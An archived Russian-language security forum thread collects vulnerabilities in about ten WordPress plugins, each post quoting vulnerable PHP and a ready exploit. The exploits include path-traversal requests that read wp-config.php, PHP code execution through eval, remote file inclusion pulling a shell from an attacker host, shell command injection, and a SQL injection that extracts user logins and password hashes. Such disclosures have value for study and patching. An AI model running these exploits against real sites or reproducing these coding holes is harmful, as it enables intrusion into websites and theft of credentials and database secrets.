RDot: White Hat Security Community

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Сценарии/CMF/СMS (https://rdot.org/forum/forumdisplay.php?f=15)
-   -   Уязвимости WordPress и плагинов (https://rdot.org/forum/showthread.php?t=68)

RulleR 05.07.2010 12:58

Уязвимости WordPress и плагинов
 
Plugin name: myEASYbackup (download)
Version: 0.1.3

File Disclosure

Vuln file: /wp-content/plugins/myeasybackup/meb_download.php
PHP код:

/*...*/
$tmp explode('://'$_SERVER['HTTP_REFERER']);
$path explode('/'$tmp[1]);
$referer $path[0];

if(    (
$_SERVER['HTTP_HOST'] != $_SERVER['SERVER_NAME'])
        ||
    (
$_SERVER['HTTP_HOST'] != $referer)
        ||
    (
$_SERVER['SERVER_NAME'] != $referer) )
{
/*...*/
    
echo 'Nice try, you cheeky monkey!';    #    0.0.5
    
return;
}
/*...*/
$file_name $_POST['dwn_file'];    #    0.0.5

$file MEBAK_BACKUP_PATH '/' $file_name;
/*...*/
if(file_exists($file))
{
/*...*/
    
readfile($file);


Exploit:
Код:

POST http://[host]/[path]/wp-content/plugins/myeasybackup/meb_download.php HTTP/1.0
Referer: http://[host]

dwn_file=[path]/wp-config.php


RulleR 05.07.2010 13:00

WordPress Plugin [WP PageFlip Lite] Local File Inclusion Vulnerability
 
Plugin name: WP PageFlip Lite (download)
Version: 1.4.2

Local File Inclusion

Vuln file: /wp-content/plugins/wp-pageflip/wp_pageflip.php
PHP код:

/*...*/
if (isset($_POST['pageflip_language'])) $pageflip_language $_POST['pageflip_language'];
else 
$pageflip_language get_option('pageflip_language');
if (
$pageflip_language!='') include($plugin_dir.'languages/'$pageflip_language);
/*...*/ 

Exploit:
Код:

POST http://[host]/[path]/wp-content/plugins/wp-pageflip/wp_pageflip.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

pageflip_language=../../../../../../../[local_file]


RulleR 05.07.2010 13:02

WordPress Plugin [WP Emaily] File Disclosure Vulnerability
 
Plugin name: WP Emaily (download)
Version: 0.8

File Disclosure

Vuln file: /wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php
PHP код:

/*...*/
$filedata WPEmaily::readFile(WPEMAILY_PATH.'emails/'.$_GET['filename']);
/*...*/
// add the binary data stored in the string 'filedata'
$zipfile -> add_file($filedata$dir."/index.html");  

// the next three lines force an immediate download of the zip file:
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false);
header("Content-Type: application/zip");
header("Content-disposition: attachment; filename={$_GET['filename']}.zip");  
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($name));

echo 
$zipfile -> file();
/*...*/

# file: /wp-content/plugins/wp-emaily/wp-emaily-class.php

    
function readFile ($filename)
    {        
        if ( ! 
file_exists($filename) || ! $fp = @fopen($filename'rb')) {
            return 
FALSE;
        }
        
flock($fpLOCK_SH);
        
        
$dump '';
        if (
filesize($filename) > 0) {
            
$dump fread($fpfilesize($filename)); 
        }
    
        
flock($fpLOCK_UN);
        
fclose($fp); 

        return 
$dump;
    } 

Exploit:
Код:

http://[host]/[path]/wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php?filename=../../../../wp-config.php
Note: На выходе получаем zip-архив, внутри которого, в файле /email/index.html будет записан конфиг ВП.

RulleR 05.07.2010 13:04

WordPress Plugin [BuzzFeed] PHP Code Execution Vulnerability
 
Plugin name: BuzzFeed (download)
Version: 1.1.4

PHP Code Execution

Vuln file: /wp-content/plugins/buzzfeed/preview.php
PHP код:

/*...*/
if( isset( $_POST"previewTemplate" ] ) && $_POST"previewTemplate" ] == "on" && $_POST"templateChanged" ] == "true" ){
    
$cols $config"cols" ]; 
    
$rows $config"rows" ];
    
$tempTemplate ""
    
    
$bf = new BuzzFeed$config );
    
$buzzes $bf->getBuzzes(); 
    
    
ob_start(); 
    eval( 
"?>{$_POST['template']});// :D
    
$contents ob_get_contents(); 
    
ob_end_clean(); 
/*...*/ 

Exploit:
Код:

POST http://[host]/[path]/wp-content/plugins/buzzfeed/preview.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

previewTemplate=on&templateChanged=true&template=<?phpinfo()?>


RulleR 05.07.2010 13:06

WordPress Plugin [Custom Field List Widget] Remote File Inclusion Vulnerability
 
Plugin name: Custom Field List Widget (download)
Version: 1.1.1

Remote File Inclusion

Vuln file: /wp-content/plugins/custom-field-list-widget/widget_custom_field_list_individual_href_save_data .php
PHP код:

/*...*/
<?php
if (isset($_POST['abspath'])) {
    require_once(
urldecode($_POST['abspath']).'wp-config.php');
    if ( 
FALSE == function_exists('wp_verify_nonce') or FALSE == wp_verify_nonce($_POST['_ajax_nonce'], 'customfieldlist_dbaction_security') ) {
        die(
__('Security Check failed!','customfieldlist'));
/*...*/

Need: allow_url_include = On
Exploit:
Код:

POST http://[host]/[path]/wp-content/plugins/custom-field-list-widget/widget_custom_field_list_individual_href_save_data.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

abspath=http://[evil_host]/shell.wtf?


oRb 05.07.2010 13:27

Plugin name: UnGallery
Version: 0.8

Remote File Disclosure
PHP код:

if ($_GET['pic']) {
    
$filename $_GET['pic'];
    
$len filesize($filename);
    
$lastslash =  strrpos($filename"/");
    
$name =  substr($filename$lastslash 1);   

    
header("Content-type: image/jpeg;\r\n");
    
header("Content-Length: $len;\r\n");
    
header("Content-Transfer-Encoding: binary;\r\n");
    
header('Content-Disposition: inline; filename="'.$name.'"');    //  Render the photo inline.
    
readfile($filename);


Код:

$ curl http://wordpress/wp-content/plugins/ungallery/source.php?pic=../../../wp-config.php
Shell Command Execution
PHP код:

$dir "wp-content/plugins/ungallery/pics/" $_GET['zip'];

// Create the arrays with the dir's image files
$dp opendir($dir);
while (
$filename readdir($dp)) {
    if (!
is_dir($dir."/pics/".$gallery"/"$filename))  {                                      // If it's a file, begin
        
$pic_types = array("JPG""jpg""GIF""gif""PNG""png");         
        if (
in_array(substr($filename, -3), $pic_types)) $pic_array[] = $filename;                // If it's a image, add it to pic array
    
}
}
foreach (
$pic_array as $filename) {
    
$media_files $media_files " " $dir "/" $filename;
}

$output = `zip -u -j $dir/pics.zip $media_files`;

print 
"<pre>$output</pre>";
print 
'Complete. The file can be downloaded <a href="./wp-content/plugins/ungallery/source.php?zip=pics/' $_GET['zip'] . '/pics.zip">here</a>';
print  
'<br><br>You can return to the gallery <a href="./gallery?gallerylink=' $_GET['zip'] .'">here.</a>'

Код:

http://wordpress/wp-content/plugins/ungallery/zip.php?zip=non_existing_dir+non_existing_file;ls;pwd;
ps: Тут же можно провернуть XSS

RulleR 05.07.2010 13:40

WordPress Plugin [jRSS Widget] File Disclosure Vulnerability
 
Plugin name: jRSS Widget (download)
Version: 1.0

File Disclosure

Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP код:

header('Content-type: application/xml');
$handle fopen($_REQUEST['url'], "r");

if ( 
$handle ) {
    while ( !
feof($handle) ) {
        
$buffer fgets($handle4096);
        echo 
$buffer;
    }
    
fclose($handle);


Exploit:
Код:

POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

url=../../../wp-config.php


Strilo4ka 06.07.2010 18:39

Plugin name: Count per Day (download)
Version: 2.10.1

SQL inj

Vuln file: wp-content/plugins/count-per-day/notes.php
PHP код:

/*...*/
if ( isset($_POST['month']) )
    $month = $_POST['month'];
else if ( isset($_GET['month']) )
    $month = $_GET['month'];
else    
    $month = date('m');

if ( isset($_POST['month']) )
    $year = $_POST['year'];
else if ( isset($_GET['year']) )
    $year = $_GET['year'];
else    
    $year = date('Y');

/*...*/$where = '';
if ( $month )
    $where .= " AND MONTH(date) = $month "; 
if ( $year )
    $where .= " AND YEAR(date) = $year ";
$notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);

/*...*/else
        {
            ?>
            <tr>
                <td><?php echo $row['date'?></td>
                <td><?php echo $row['note'?></td>
                <td><input type="image" src="cpd_pen.png" name="edit_<?php echo $row['id'?>" title="<?php _e('edit''cpd'?>" style="width:auto;" /></td>
            </tr>
            <?php
        
}
/*...*/

Exploit:
Код:

http://[host]/[path]/plugins/count-per-day/notes.php?month=1 and 0 union select 1,2,concat_ws(0x3a,user_login,user_pass) from wp_users limit 0,1/*
Note: Можно постом

Strilo4ka 06.07.2010 18:40

Plugin name: Eventify - Simple Events (download)
Version: 1.6.e

Local File Inclusion

Vuln file: /wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
PHP код:

require_once(str_ireplace("/wp-content","",$_POST['npath']).'/wp-load.php');
        
$eventid =  $_POST['eventid'];
        
$action "fetch";

        if(
$action=="fetch"){
            global 
$wpdb;
            
$table_name $wpdb->prefix."em_main";
            
$qry"select * from ".$table_name." where em_id='$eventid'" ;
            
//echo $qry;
                //echo $qry;
                 
$results $wpdb->get_results($qry);
                echo 
'<div class="event_title">'.$results[0]->em_title.'</div>
                <div class="event_description"><em>Description:</em> '
.$results[0]->em_desc.'</div>
                <div class="event_venue"><em>Venue:</em> '
.$results[0]->em_venue.'</div>
                <div class="event_time"><em>Time:</em> '
.$results[0]->em_time.'</div>




                '
;

                
//echo $qry;

        


Exploit:
Код:

POST
http://[host]/[path]/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
npath=../../readme.txt%00

Note: Хотел провести еще и иньекцию, но бло, кавычка екранируеться (если файл вордпреса инклудить)... Мб есть где файл в вордпересе что даст успешную експлуатацию иньекции! Не пишу need потому что есть замена %00. В новых v. не сработает . В предыдущих плагинах можно еще куками, забыл, так как в $_REQUEST и куки. ;)

Strilo4ka 06.07.2010 18:40

Plugin name: GRAND Flash Album Gallery (download)

Version: 0.48
Updated: 2010-6-5
Downloads: 76,908

Читалка или пути если пхп<5

Vuln file: wp-content\plugins\flash-album-gallery\admin\news.php
PHP код:

<?php
extract
($_POST);
$str file_get_contents($want2Read);echo $want2Read;
echo 
$str;
?>

Exploit:
Код:

POST
want2Read=../../../../license.txt

<form action="http://[host]/wp-content/plugins/flash-album-gallery/admin/news.php" method=post>
<input name=want2Read type=text value="../readme.txt">
<input type=submit>
</form>

Константы для соединения с БД тут:
Код:

../../../../wp-config.php


Часовой пояс GMT +3, время: 01:51.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot